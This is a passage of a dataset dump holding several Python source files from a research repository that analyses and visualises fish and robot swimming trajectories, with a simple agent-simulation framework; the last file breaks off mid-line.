"alpha_fraction": 0.7123287916183472,
"alphanum_fraction": 0.7488584518432617,
"avg_line_length": 27.565217971801758,
"blob_id": "aaaf3e7de1cdddf3883e810e2644e9f6808c5bfa",
"content_id": "cb4d82c1e2898113951c0bc2c387b9b198bc88e2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 657,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 23,
"path": "/find/plots/dl_si_2021/__init__.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "from find.plots.dl_si_2021 import individual_quantities\nfrom find.plots.dl_si_2021 import collective_quantities\nfrom find.plots.dl_si_2021 import correlation_quantities\nfrom find.plots.dl_si_2021 import occupancy_grids\nfrom find.plots.dl_si_2021 import nn_plots\n\nplot_dict = {\n 'individual_quantities': individual_quantities.plot,\n 'collective_quantities': collective_quantities.plot,\n 'correlation_quantities': correlation_quantities.plot,\n 'occupancy_grids': occupancy_grids.plot,\n 'nn_plots': nn_plots.plot,\n}\n\nsource = 'dl-si-2021'\n\n\ndef available_plots():\n return list(plot_dict.keys())\n\n\ndef get_plot(key):\n return plot_dict[key]\n"
},
{
"alpha_fraction": 0.501852810382843,
"alphanum_fraction": 0.5203811526298523,
"avg_line_length": 29.224000930786133,
"blob_id": "d1175e661f7746e30b9d28116e21dc62f55f8117",
"content_id": "e87413a54f775f65e372d7f8201c2af1de8a1aae",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3778,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 125,
"path": "/find/plots/spatial/grid_distribution_comparison.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nimport os\nimport glob\nimport argparse\nimport numpy as np\n\nfrom tqdm import tqdm, trange\nfrom find.plots.common import *\n\n\nfrom pathlib import Path\nimport matplotlib\nfrom scipy.interpolate import griddata\nimport scipy.stats as st\n\n\ndef occupancy_grid_dist(data, fig, type, ax, args, pad=0.05):\n grid = {}\n xy = np.empty((0, 2))\n for traj in data[type]:\n tsteps = traj.shape[0]\n individuals = traj.shape[1] // 2\n idcs = range(individuals)\n for i in range(tsteps):\n for j in idcs:\n traj_x = traj[i, j * 2]\n traj_y = traj[i, j * 2 + 1]\n xy = np.vstack((xy, np.array([traj_x, traj_y]).T))\n\n cmap = matplotlib.cm.get_cmap('jet')\n _ = plt.figure(figsize=(6, 6))\n ax = plt.gca()\n\n xx, yy = np.mgrid[-0.3:0.3:300j, -0.3:0.3:300j]\n kernel = st.gaussian_kde(xy.T)\n grid_pos = np.vstack([xx.ravel(), yy.ravel()])\n f = np.reshape(kernel(grid_pos).T, xx.shape)\n ax.contourf(xx, yy, f, cmap=cmap)\n outer = plt.Circle(\n (0, 0), 0.25, color='k', fill=False)\n ax.add_artist(outer)\n ax.set_xlim([-0.3, 0.3])\n ax.set_ylim([-0.3, 0.3])\n grid['xx'] = xx\n grid['yy'] = yy\n grid['f'] = f\n return ax, grid\n\n\ndef plot_grid_differences(files, path, args):\n keys = args.type\n if 'Real' not in keys and ('Hybrid' not in keys or 'Virtual' not in keys):\n import warnings\n warnings.warn('Skipping grid difference plots')\n return\n\n keys.remove('Real')\n skipped = 0\n\n desc = 'Occupancy grid distribution difference (Skipped {})'\n num_files = trange(\n len(files), desc=desc.format(skipped), leave=True)\n\n for i in num_files:\n f = files[i]\n r_xx = np.loadtxt(f.replace('f_Real', 'xx_Real'))\n r_yy = np.loadtxt(f.replace('f_Real', 'yy_Real'))\n r_f = np.loadtxt(f)\n\n for k in keys:\n if not os.path.isfile(f.replace('_Real', '_{}'.format(k))):\n skipped += 1\n num_files.set_description(desc.format(skipped), refresh=True)\n continue\n comp_f = np.loadtxt(f.replace('_Real', '_{}'.format(k)))\n comp_f[comp_f <= 1e-40] = 0\n r_f[r_f <= 1e-40] = 0\n f_diff = r_f - comp_f\n\n cmap = matplotlib.cm.get_cmap('jet')\n _ = plt.figure(figsize=(6, 6))\n ax = plt.gca()\n\n ax.contourf(r_xx, r_yy, np.abs(f_diff), levels=100, cmap=cmap)\n outer = plt.Circle(\n (0, 0), 0.25, color='k', fill=False)\n ax.add_artist(outer)\n ax.set_xlim([-0.3, 0.3])\n ax.set_ylim([-0.3, 0.3])\n\n plt.savefig(\n '/' + '/'.join(f.split('/')[:-1]) + '/occupancy_dist_diff_{}-{}.png'.format('Real', k))\n print('/'.join(f.split('/')\n [:-1]) + '/occupancy_dist_diff_{}-{}.png'.format('Real', k))\n input()\n plt.close()\n\n\ndef plot(exp_files, path, args):\n files = []\n for p in Path(path).rglob('f_Real.dat'):\n files.append(str(p))\n plot_grid_differences(files, path, args)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Visualize grid position differences')\n parser.add_argument('--type',\n nargs='+',\n default=['Real', 'Hybrid', 'Virtual'],\n choices=['Real', 'Hybrid', 'Virtual'])\n args = parser.parse_args()\n\n exp_files = {}\n for t in args.type:\n if t == 'Real':\n exp_files[t] = args.original_files\n elif t == 'Hybrid':\n exp_files[t] = args.hybrid_files\n elif t == 'Virtual':\n exp_files[t] = args.virtual_files\n\n plot(exp_files, './', args)\n"
},
{
"alpha_fraction": 0.4371327757835388,
"alphanum_fraction": 0.47740626335144043,
"avg_line_length": 35.56640625,
"blob_id": "00cbf7105de9d0e7b10887f929e99bec1e110f32",
"content_id": "455a574e4265ea379232c7847eae3e1b0bc96313",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9361,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 256,
"path": "/find/plots/dl_si_2021/individual_quantities.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nimport glob\nimport argparse\nfrom turtle import left, position\n\nfrom find.utils.features import Velocities\nfrom find.plots.common import *\nimport find.plots.common as shared\n\nimport find.plots.spatial.resultant_velocity as rv\nimport find.plots.spatial.distance_to_wall as dtw\nimport find.plots.spatial.relative_orientation as relor\n\nfrom matplotlib.ticker import (MultipleLocator, FormatStrFormatter,\n AutoMinorLocator, FuncFormatter)\n\nROBOT_DATA = True\nTRAJNET_DATA = False\nPFW_DATA = False\nDISABLE_TOULOUSE = False\n\n# TRAJNET_DATA = False\n# PFW_DATA = False\n# DISABLE_TOULOUSE = False\n\n# TRAJNET_DATA = False\n# PFW_DATA = True\n# DISABLE_TOULOUSE = False\n\n# TRAJNET_DATA = True\n# PFW_DATA = False\n# DISABLE_TOULOUSE = True\n\n\ndef reset_palette():\n if TRAJNET_DATA:\n shared._uni_pallete = [\"#000000\", \"#ed8b02\", \"#e74c3c\"]\n elif PFW_DATA:\n shared._uni_pallete = [\"#000000\", \"#D980FA\"]\n elif ROBOT_DATA:\n shared._uni_pallete = [\"#000000\", \"#e74c3c\", \"#2596be\"]\n else:\n shared._uni_pallete = [\"#000000\", \"#e74c3c\", \"#3498db\", \"#2ecc71\"]\n\n\ndef annot_axes(ax, xlabel, ylabel, xlim, ylim, xloc, yloc, yscale):\n ax.set_xlabel(xlabel)\n ax.set_xlim(xlim)\n ax.xaxis.set_major_locator(MultipleLocator(xloc[0]))\n ax.xaxis.set_minor_locator(MultipleLocator(xloc[1]))\n ax.tick_params(axis=\"x\", which='both',\n direction=\"in\")\n ax.tick_params(axis=\"x\", which='major', length=4.0, width=0.7)\n ax.tick_params(axis=\"x\", which='minor', length=2.0, width=0.7)\n\n ax.set_ylabel(ylabel)\n ylim = [e / yscale for e in ylim]\n ax.set_ylim(ylim)\n ax.get_yaxis().set_major_formatter(\n FuncFormatter(lambda x, p: '{:.1f}'.format(x * yscale, ',')))\n ax.yaxis.set_major_locator(MultipleLocator(yloc[0] / yscale))\n ax.yaxis.set_minor_locator(MultipleLocator(yloc[1] / yscale))\n ax.tick_params(which='both', bottom=True,\n left=True, right=True, top=True)\n ax.tick_params(axis=\"y\", which='both', direction=\"in\")\n ax.grid(False)\n return ax\n\n\ndef plot(exp_files, path, args):\n data = {}\n for e in sorted(exp_files.keys()):\n pos = glob.glob(args.path + '/' + exp_files[e])\n if len(pos) == 0:\n continue\n data[e] = {}\n data[e]['pos'] = []\n data[e]['vel'] = []\n data[e]['rvel'] = []\n data[e]['distance_to_wall'] = []\n for p in pos:\n if e == 'Virtual (Toulouse)' and not DISABLE_TOULOUSE:\n f = open(p)\n # to allow for loading fortran's doubles\n strarray = f.read().replace(\"D+\", \"E+\").replace(\"D-\", \"E-\")\n f.close()\n num_ind = len(strarray.split('\\n')[0].strip().split(' '))\n positions = np.fromstring(\n strarray, sep='\\n').reshape(-1, num_ind) * args.radius\n elif e == 'Virtual (Toulouse cpp)':\n positions = np.loadtxt(p)[:, 2:] * args.radius\n else:\n positions = np.loadtxt(p) * args.radius\n if e == 'Robot':\n velocities = Velocities([positions], 0.1).get()[0]\n else:\n velocities = Velocities([positions], args.timestep).get()[0]\n linear_velocity = np.array((velocities.shape[0], 1))\n tup = []\n dist_mat = []\n for i in range(velocities.shape[1] // 2):\n linear_velocity = np.sqrt(\n velocities[:, i * 2] ** 2 + velocities[:, i * 2 + 1] ** 2).tolist()\n tup.append(linear_velocity)\n\n distance = args.radius - \\\n np.sqrt(positions[:, i * 2] ** 2 +\n positions[:, i * 2 + 1] ** 2)\n dist_mat.append(distance)\n dist_mat = np.array(dist_mat).T\n\n data[e]['rvel'].append(np.array(tup).T)\n data[e]['pos'].append(positions)\n data[e]['vel'].append(velocities)\n data[e]['distance_to_wall'].append(dist_mat)\n\n ###############################################################################\n # Virtual\n ###############################################################################\n _, ax = plt.subplots(figsize=(10, 3),\n nrows=1, ncols=3,\n gridspec_kw={'width_ratios': [\n 1, 1, 1], 'wspace': 0.25, 'hspace': 0.38}\n )\n\n # velocity\n sub_data = data.copy()\n if 'Hybrid' in sub_data.keys():\n del sub_data['Hybrid']\n\n reset_palette()\n ax[0] = rv.compute_resultant_velocity(sub_data, ax[0], args, [0, 41])\n yscale = 100\n ax[0] = annot_axes(ax[0],\n '$V$ (cm/s)', r'PDF $(\\times {})$'.format(yscale),\n # [0.0, 35.0], [0.0, 7.2],\n # [0.0, 35.0], [0.0, 22],\n [0.0, 35.0], [0.0, 9],\n [5, 2.5], [2, 1],\n yscale)\n\n # distance to wall\n distances = {}\n positions = {}\n for k in data.keys():\n distances[k] = data[k]['distance_to_wall']\n positions[k] = data[k]['pos']\n sub_data_d = distances.copy()\n sub_data_p = positions.copy()\n if 'Hybrid' in sub_data_d.keys():\n del sub_data_d['Hybrid']\n del sub_data_p['Hybrid']\n\n reset_palette()\n dtw.distance_plot(sub_data_d, sub_data_p, ax[1], args, [0, 25])\n yscale = 100\n ax[1] = annot_axes(ax[1],\n r'$r_w$ (cm)', r'PDF $(\\times {})$'.format(yscale),\n [0.0, 25.0], [0.0, 25],\n [5, 2.5], [5, 2.5],\n yscale)\n\n # relative angle to the wall\n sub_data = data.copy()\n if 'Hybrid' in sub_data.keys():\n del sub_data['Hybrid']\n\n reset_palette()\n relor.relative_orientation_to_wall(sub_data, ax[2], args)\n yscale = 100\n ax[2] = annot_axes(ax[2],\n r'$\\theta_{\\rm w}$ $(^{\\circ})$',\n r'PDF $(\\times {})$'.format(yscale),\n [-180, 180], [0, 2.0],\n [90, 30], [0.5, 0.25],\n yscale)\n\n # ax[0].text(-0.2, 1.07, r'$\\mathbf{A}$',\n # fontsize=18, transform=ax[0].transAxes)\n # ax[1].text(-0.2, 1.07, r'$\\mathbf{B}$',\n # fontsize=18, transform=ax[1].transAxes)\n # ax[2].text(-0.2, 1.07, r'$\\mathbf{C}$',\n # fontsize=18, transform=ax[2].transAxes)\n\n plt.gcf().subplots_adjust(bottom=0.141, left=0.055, top=0.965, right=0.985)\n plt.savefig(path + 'individual_quantities_virtual.png')\n\n ###############################################################################\n # Hybrid\n ###############################################################################\n _, ax = plt.subplots(figsize=(10, 3),\n nrows=1, ncols=3,\n gridspec_kw={'width_ratios': [\n 1, 1, 1], 'wspace': 0.25, 'hspace': 0.38}\n )\n\n sub_data = data.copy()\n if 'Virtual' in sub_data.keys():\n del sub_data['Virtual']\n if 'Virtual (Toulouse)' in sub_data.keys():\n del sub_data['Virtual (Toulouse)']\n\n reset_palette()\n ax[0] = rv.compute_resultant_velocity(sub_data, ax[0], args, [0, 41])\n yscale = 100\n ax[0] = annot_axes(ax[0],\n '$V$ (cm/s)', r'PDF $(\\times {})$'.format(yscale),\n # [0.0, 35.0], [0.0, 7.2],\n # [0.0, 35.0], [0.0, 22],\n [0.0, 35.0], [0.0, 9],\n [5, 2.5], [2, 1],\n yscale)\n\n sub_data_d = distances.copy()\n sub_data_p = positions.copy()\n if 'Virtual' in sub_data_d.keys():\n del sub_data_d['Virtual']\n del sub_data_p['Virtual']\n if 'Virtual (Toulouse)' in sub_data_d.keys():\n del sub_data_p['Virtual (Toulouse)']\n del sub_data_d['Virtual (Toulouse)']\n\n reset_palette()\n dtw.distance_plot(sub_data_d, sub_data_p, ax[1], args, [0, 25])\n yscale = 100\n ax[1] = annot_axes(ax[1],\n r'$r_w$ (cm)', r'PDF $(\\times {})$'.format(yscale),\n [0.0, 25.0], [0.0, 25],\n [5, 2.5], [5, 2.5],\n yscale)\n\n sub_data = data.copy()\n if 'Virtual' in sub_data.keys():\n del sub_data['Virtual']\n if 'Virtual (Toulouse)' in sub_data.keys():\n del sub_data['Virtual (Toulouse)']\n\n reset_palette()\n relor.relative_orientation_to_wall(sub_data, ax[2], args)\n yscale = 100\n ax[2] = annot_axes(ax[2],\n r'$\\theta_{\\rm w}$ $(^{\\circ})$',\n r'PDF $(\\times {})$'.format(yscale),\n [-180, 180], [0, 2.0],\n [90, 30], [0.5, 0.25],\n yscale)\n\n # ax[0].text(-0.2, 1.07, r'$\\mathbf{A}$',\n # fontsize=18, transform=ax[0].transAxes)\n # ax[1].text(-0.2, 1.07, r'$\\mathbf{B}$',\n # fontsize=18, transform=ax[1].transAxes)\n # ax[2].text(-0.2, 1.07, r'$\\mathbf{C}$',\n # fontsize=18, transform=ax[2].transAxes)\n\n plt.gcf().subplots_adjust(bottom=0.141, left=0.055, top=0.965, right=0.985)\n plt.savefig(path + 'individual_quantities_hybrid.png')\n"
},
{
"alpha_fraction": 0.5847457647323608,
"alphanum_fraction": 0.5854237079620361,
"avg_line_length": 27.365385055541992,
"blob_id": "17b99969c6d4ecc8886aed41c3d84c3a971acdba",
"content_id": "69f4bb021e0598738e758d684e69feb937be4bf8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2950,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 104,
"path": "/find/simulation/simu/simulation/simulation.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "import os\nimport numpy as np\nimport warnings\nimport tqdm\nimport socket\nimport datetime\n\nfrom random import shuffle\n\n\nclass Simulation:\n def __init__(self, timestep, num_iterations, args={'stats_enabled': False, 'simu_dir_gen': True}):\n self._individual_list = []\n self._descriptor_list = []\n self._stat_list = []\n self._num_iterations = num_iterations\n self._current_iteration = 0\n self._args = args\n self._timestep = timestep\n self._dirname = ''\n\n if 'simu_dir_gen' in self._args.keys() and self._args['simu_dir_gen']:\n hostname = socket.gethostname()\n timestamp = datetime.datetime.now().strftime(\"%Y_%m_%d_%H_%M_%S\")\n self._dirname = hostname + '_' + timestamp\n if not os.path.exists(self._dirname):\n os.makedirs(self._dirname)\n\n def get_simu(self):\n return self\n\n def add_individual(self, individual):\n self._individual_list.append(individual)\n return self\n\n def add_descriptor(self, desc):\n self._descriptor_list.append(desc)\n return self\n\n def add_stat(self, stat):\n self._stat_list.append(stat)\n return self\n\n def get_num_individuals(self):\n return len(self._individual_list)\n\n def get_individuals(self):\n return self._individual_list\n\n def get_num_iterations(self):\n return self._num_iterations\n\n def get_current_iteration(self):\n return self._current_iteration\n\n def get_dirname(self):\n return self._dirname\n\n def get_descriptors(self):\n return self._descriptor_list\n\n def get_stats(self):\n return self._stat_list\n\n def get_timestep(self):\n return self._timestep\n\n def _update(self):\n if 'stats_enabled' in self._args.keys() and self._args['stats_enabled']:\n for obj in self._stat_list:\n obj(self)\n\n for obj in self._descriptor_list:\n obj(self)\n\n def dump(self):\n if 'stats_enabled' in self._args.keys() and self._args['stats_enabled']:\n for obj in self._stat_list:\n obj.save()\n\n for obj in self._descriptor_list:\n obj.save()\n\n def spin_once(self):\n ind_ids = list(range(len(self._individual_list)))\n shuffle(ind_ids)\n for idx in ind_ids:\n self._individual_list[idx].run(self)\n\n if 'stats_enabled' in self._args.keys() and self._args['stats_enabled']:\n self._update()\n\n if self._current_iteration > self._num_iterations:\n warnings.warn(\n 'You have exceeded the number of iterations allocated for this simulation')\n\n self._current_iteration += 1\n\n def spin(self):\n for _ in tqdm.tqdm(range(self._num_iterations)):\n self.spin_once()\n\n if 'stats_enabled' in self._args.keys() and self._args['stats_enabled']:\n self.dump()\n"
},
{
"alpha_fraction": 0.5895196795463562,
"alphanum_fraction": 0.594856858253479,
"avg_line_length": 26.851350784301758,
"blob_id": "a332c88ebb69bffe0739df5db5656cdd373a87d0",
"content_id": "9d799fd367bce6d488c6b3a62bc930917bc2e898",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2061,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 74,
"path": "/find/simulation/simu/simulation/individual.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "import numpy as np\n\n\nclass Individual:\n _ind_id = 0\n\n def __init__(self, is_robot=False):\n self._is_robot = is_robot\n self._id = Individual._ind_id\n Individual._ind_id += 1\n self._position = None\n self._velocity = None\n self._acceleration = None\n self._position_history = None\n self._velocity_history = None\n\n def reset_ind_id():\n Individual._ind_id = 0\n\n def get_id(self):\n return self._id\n\n def get_position(self):\n return self._position\n\n def get_velocity(self):\n return self._velocity\n\n def get_acceleration(self):\n return self._acceleration\n\n def set_position(self, pos):\n self._position = pos\n\n def set_velocity(self, vel):\n self._velocity = vel\n\n def get_position_history(self):\n return self._position_history\n\n def get_velocity_history(self):\n return self._velocity_history\n\n def set_position_history(self, posh):\n self._position_history = posh\n self._position = self._position_history[-1, :]\n\n def set_velocity_history(self, velh):\n self._velocity_history = velh\n self._velocity = self._velocity_history[-1, :]\n\n def is_robot(self):\n return self._is_robot\n\n def run(self, simu):\n self.interact(simu)\n self.move(simu)\n self._history_update(simu)\n\n def interact(self, simu):\n assert False, 'You need to implement this function in a subclass'\n\n def move(self, simu):\n assert False, 'You need to implement this function in a subclass'\n\n def _history_update(self, simu):\n if self._position_history is None:\n self._position_history = np.empty((0, len(self._position)))\n self._velocity_history = np.empty((0, len(self._velocity)))\n else:\n self._position_history = np.vstack(\n (self._position_history, self._position.reshape(1, -1)))\n self._velocity_history = np.vstack(\n (self._velocity_history, self._velocity.reshape(1, -1)))\n"
},
{
"alpha_fraction": 0.7467249035835266,
"alphanum_fraction": 0.7467249035835266,
"avg_line_length": 20.809524536132812,
"blob_id": "053bc057cd3a59b187088cf596ac76fab542bada",
"content_id": "ef04dd7a6ccf2dbd69d21ab5ef62ffb45a1228f3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 458,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 21,
"path": "/find/plots/trajectory_visualisation/__init__.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "from find.plots.trajectory_visualisation import visualise_trajectories\nfrom find.plots.trajectory_visualisation import trajectory_grid\n\nplot_dict = {\n 'visualise_trajectories': visualise_trajectories.plot,\n 'trajectory_grid': trajectory_grid.plot,\n}\n\nsource = 'trajectory_visualisation'\n\n\ndef available_plots():\n return list(plot_dict.keys())\n\n\ndef available_plots():\n return list(plot_dict.keys())\n\n\ndef get_plot(key):\n return plot_dict[key]\n"
},
{
"alpha_fraction": 0.43743908405303955,
"alphanum_fraction": 0.4564412534236908,
"avg_line_length": 40.88571548461914,
"blob_id": "f3af7536a55ff91ad8a1abf4fc7d1b7c38a2a0f8",
"content_id": "3864252253f7c9fa86f53fa3a7afe1cc42c8d02b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10262,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 245,
"path": "/find/plots/trajectory_visualisation/visualise_trajectories.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nimport os\nimport glob\nimport random\nimport argparse\nimport numpy as np\nfrom tqdm import tqdm\nfrom PIL import Image\n\nimport find.plots as fp\nfrom find.utils.features import Velocities\nfrom find.utils.utils import compute_leadership\nfrom find.plots.common import *\n\nTOULOUSE_DATA = False\nTOULOUSE_CPP_DATA = False\n\n\ndef plot(foo, path, args):\n mpath = os.path.dirname(fp.__file__)\n\n # random select an experiment to visualise\n trajectories = []\n if args.traj_visualisation_list == 'random':\n files = glob.glob(args.path + '/generated/*_positions.dat')\n trajectories.append(np.loadtxt(random.choice(files)) * args.radius)\n else:\n files = args.traj_visualisation_list\n for f in files:\n if TOULOUSE_DATA:\n fi = open(f)\n # to allow for loading fortran's doubles\n strarray = fi.read().replace(\"D+\", \"E+\").replace(\"D-\", \"E-\")\n fi.close()\n num_ind = len(strarray.split('\\n')[0].strip().split(' '))\n positions = np.fromstring(\n strarray, sep='\\n').reshape(-1, num_ind) * args.radius\n elif TOULOUSE_CPP_DATA:\n positions = np.loadtxt(f)[:, 2:] * args.radius\n else:\n positions = np.loadtxt(f) * args.radius\n trajectories.append(positions)\n\n # TODO: parallelise multiple visualisations ?\n for fidx, traj in enumerate(trajectories):\n vel = Velocities([traj], args.timestep).get()[0]\n\n if args.fish_like: # TODO: needs to be adjusted for more than 1 individuals\n pictures = {}\n\n if traj.shape[1] // 2 == 2:\n pictures[0] = []\n pictures[1] = []\n\n pictures[0].append(Image.open(\n mpath + '/res/fish_artwork_red_down.png'))\n pictures[0].append(Image.open(\n mpath + '/res/fish_artwork_red_up.png'))\n\n pictures[1].append(Image.open(\n mpath + '/res/fish_artwork_blue_down.png'))\n pictures[1].append(Image.open(\n mpath + '/res/fish_artwork_blue_up.png'))\n else:\n for ind in range(traj.shape[1] // 2):\n pictures[ind] = []\n pictures[ind].append(Image.open(\n mpath + '/res/fish_artwork_blue_down.png'))\n pictures[ind].append(Image.open(\n mpath + '/res/fish_artwork_blue_up.png'))\n\n # pick the range of trajectories to visualise\n if args.range is not None: # keep the timesteps defined by the CLI parameters\n idcs = list(map(int, args.range))\n traj = traj[idcs[0]:idcs[1], :]\n vel = vel[idcs[0]:idcs[1], :]\n\n fps = 1 // args.timestep\n # In case the user wants to produce smoother videos (s)he can opt to fill frames between actual data points\n if args.fill_between > 0:\n fps *= args.fill_between\n\n filled_traj = np.empty(\n ((traj.shape[0] - 1) * args.fill_between, 0))\n filled_vel = np.empty(((traj.shape[0] - 1) * args.fill_between, 0))\n\n for idx in range(traj.shape[1] // 2):\n ft = np.empty((0, 2))\n fv = np.empty((0, 2))\n for i in tqdm(range(traj.shape[0] - 1), desc='filling trajectories'):\n fill_x = np.linspace(\n traj[i, idx * 2], traj[i + 1, idx * 2], args.fill_between)\n fill_y = np.linspace(\n traj[i, idx * 2 + 1], traj[i + 1, idx * 2 + 1], args.fill_between)\n fill_vx = np.linspace(\n vel[i, idx * 2], vel[i + 1, idx * 2], args.fill_between)\n fill_vy = np.linspace(\n vel[i, idx * 2 + 1], vel[i + 1, idx * 2 + 1], args.fill_between)\n ft = np.vstack(\n (ft, np.vstack((fill_x, fill_y)).T))\n fv = np.vstack(\n (fv, np.vstack((fill_vx, fill_vy)).T))\n filled_traj = np.hstack((filled_traj, ft))\n filled_vel = np.hstack((filled_vel, fv))\n traj = np.vstack((filled_traj, traj[-1, :]))\n vel = np.vstack((filled_vel, vel[-1, :]))\n\n if args.info:\n _, leadership_mat = compute_leadership(traj, vel)\n leadership_mat = np.array(leadership_mat)\n\n out_dir = path + '/' + os.path.basename(files[fidx]).split('.')[0]\n if not os.path.exists(out_dir):\n os.makedirs(out_dir)\n\n tsteps = traj.shape[0]\n tail_beat_time = 0\n for i in tqdm(range(tsteps-1)):\n _ = plt.figure(figsize=(5, 5))\n ax = plt.gca()\n\n for inum, j in enumerate(range(traj.shape[1] // 2)):\n x = traj[i, j * 2]\n y = traj[i, j * 2 + 1]\n\n if not args.fish_like:\n plt.scatter(x, y, marker='.',\n label='Individual ' + str(inum) + ' ' + \"{:.2f}\".format(x) + ' ' + \"{:.2f}\".format(y))\n else:\n phi = np.arctan2(vel[i, j * 2 + 1],\n vel[i, j * 2]) * 180 / np.pi\n\n if tail_beat_time < (args.tail_period * fps) / 2:\n rimage = pictures[j][0].rotate(phi)\n else:\n rimage = pictures[j][1].rotate(phi)\n\n ax.imshow(rimage, extent=[x - 0.035, x + 0.035, y -\n 0.035, y + 0.035], aspect='equal')\n tail_beat_time += 1\n if tail_beat_time > args.tail_period * fps:\n tail_beat_time = 0\n\n if args.info:\n plt.quiver(\n x, y, vel[i, j * 2], vel[i, j * 2 + 1], scale=1, units='xy')\n\n if args.dark:\n color = 'white'\n else:\n color = 'black'\n flag = leadership_mat[i, 1] == j\n plt.text(-0.29, 0.25, 'Geometrical leader:',\n color=color, fontsize=7)\n plt.text(-0.29, 0.23, 'Geometrical follower:',\n color=color, fontsize=7)\n if flag:\n x = -0.14\n y = 0.254\n ax.imshow(pictures[j][0], extent=[x - 0.035, x + 0.035, y -\n 0.035, y + 0.035], aspect='equal')\n else:\n x = -0.14\n y = 0.234\n ax.imshow(pictures[j][0], extent=[x - 0.035, x + 0.035, y -\n 0.035, y + 0.035], aspect='equal')\n\n if args.dark:\n color = 'white'\n else:\n color = 'black'\n outer = plt.Circle(\n args.center, args.radius*1.015, color=color, fill=False)\n ax.add_artist(outer)\n\n ax.axis('off')\n ax.set_xlim([-args.radius*1.05, args.radius*1.05])\n ax.set_ylim([-args.radius*1.05, args.radius*1.05])\n plt.tight_layout()\n\n png_fname = out_dir + '/' + str(i).zfill(6)\n if args.range:\n png_fname = out_dir + '/' + str(args.range[0] + i).zfill(6)\n plt.savefig(\n str(png_fname) + '.png',\n transparent=True,\n dpi=300\n )\n plt.close('all')\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description='Visualise the positions of the fish accompanied by the feature information')\n parser.add_argument('--traj_visualisation_list',\n type=str,\n nargs='+',\n help='List of files to visualise',\n default='random',\n required=False)\n parser.add_argument('--fish_like', action='store_true',\n help='Images instead of points',\n default=False)\n parser.add_argument('--turing', action='store_true',\n help='Same image for all individuals to perform a turing test',\n default=False)\n parser.add_argument('--info', action='store_true',\n help='Display info',\n default=False)\n parser.add_argument('--dark', action='store_true',\n help='Render dark friendly icons',\n default=False)\n parser.add_argument('--exclude_index', '-e', type=int,\n help='Index of the virtual individual',\n required=False,\n default=-1)\n parser.add_argument('--range', nargs='+',\n help='Vector containing the start and end index of trajectories to be plotted',\n required=False)\n parser.add_argument('--radius', '-r', type=float,\n help='Radius',\n default=0.25,\n required=False)\n parser.add_argument('--timestep', '-t', type=float,\n help='Simulation timestep',\n required=True)\n parser.add_argument('--fill_between', type=int,\n help='Fill frames between timesteps',\n default=0,\n required=False)\n parser.add_argument('--center',\n type=float,\n nargs='+',\n help='The centroidal coordinates for the setups used',\n default=[0.0, 0.0],\n required=False)\n parser.add_argument('--tail_period',\n type=float,\n help='Tail frequency to change the image of the fish (only used in fish_like)',\n default=0.5,\n required=False)\n\n args = parser.parse_args()\n\n plot(None, './', args)\n"
},
{
"alpha_fraction": 0.4786488115787506,
"alphanum_fraction": 0.49362650513648987,
"avg_line_length": 37.74074172973633,
"blob_id": "d92680aa3f46ad02034d5a8119a9382327080c04",
"content_id": "4e4a67f5ec3117398bb99acc3f09c0a6f83e528f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3138,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 81,
"path": "/find/plots/trajectory_visualisation/trajectory_grid.py",
"repo_name": "epfl-mobots/find",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nimport os\nimport glob\nimport random\nimport argparse\nimport numpy as np\n\nfrom find.utils.features import Velocities\nfrom find.plots.common import *\n\n\ndef plot(foo, path, args):\n trajectories = []\n if args.traj_visualisation_list == 'random':\n files = glob.glob(args.path + '/generated/*_positions.dat')\n trajectories.append(np.loadtxt(random.choice(files)) * args.radius)\n else:\n files = glob.glob(args.traj_visualisation_list)\n for f in files:\n trajectories.appened(np.loadtxt(f) * args.radius)\n\n for fidx, traj in enumerate(trajectories):\n vel = Velocities([traj], args.timestep).get()[0]\n lb, ub = 0, traj.shape[0]\n if args.range:\n lb, ub = args.range\n\n rvelocities = []\n for ind in range(traj.shape[1] // 2):\n for i in range(traj.shape[0]):\n r = np.sqrt(vel[i, ind * 2 + 1] ** 2 +\n vel[i, ind * 2] ** 2 -\n 2 * np.abs(vel[i, ind * 2 + 1]) * np.abs(vel[i, ind * 2]) * np.cos(\n np.arctan2(vel[i, ind * 2 + 1], vel[i, ind * 2])))\n rvelocities.append(r)\n _ = plt.figure(figsize=(5, 5))\n ax = plt.gca()\n outer = plt.Circle(\n args.center, args.radius, color='white', fill=False)\n ax.add_artist(outer)\n plt.plot(traj[lb:ub, ind * 2],\n traj[lb:ub, ind * 2 + 1], linewidth=0.2)\n ax.set_xlim([-args.radius*1.05, args.radius*1.05])\n ax.set_ylim([-args.radius*1.05, args.radius*1.05])\n plt.savefig(path + os.path.basename(files[fidx]) + '.png')\n\n\nif __name__ == '__main__':\n parser = 